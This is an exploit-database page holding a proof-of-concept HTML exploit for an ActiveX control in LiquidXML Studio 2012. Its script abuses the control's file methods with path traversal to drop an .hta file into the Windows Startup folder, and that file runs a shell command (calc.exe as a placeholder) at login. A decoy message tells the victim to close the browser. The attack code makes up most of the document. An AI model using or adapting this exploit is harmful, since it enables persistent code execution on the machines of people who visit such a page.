LiquidXML Studio 2012 Active-X File Creation

Posted on 26 March 2013

<html>
<object classid='clsid:8AEEAB4A-E1DA-4354-B800-8F0B553770E1' id='target'/></object>
<script>
var sofa = "..\..\..\..\..\..\..\..\..\Documents and Settings\All Users\Start Menu\Programs\Startup\the_doctor_is_in.hta";
var king = "Oh noz, Look what Dr_IDE did...<" + "SCRIPT> var x=new ActiveXObject("WScript.Shell"); x.Exec("CALC.EXE"); <" +"/SCRIPT>";
target.OpenFile(sofa,1);
target.AppendString(king);
</script>
<body>
LiquidXML Studio 2012 ActiveX Insecure Method Executable File Creation 0-day<br>
By: Dr_IDE<br>
GUID: {8AEEAB4A-E1DA-4354-B800-8F0B553770E1}<br>
Number of Interfaces: 1<br>
Default Interface: _FtpLibrary<br>
RegKey Safe for Script: False<br>
RegkeySafe for Init: False<br>
KillBitSet: False<br>
<br>
<br>
<br>
Nothing to see here, you can close the browser now...
</body>
</html>

TOP

Malware :

None in database

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20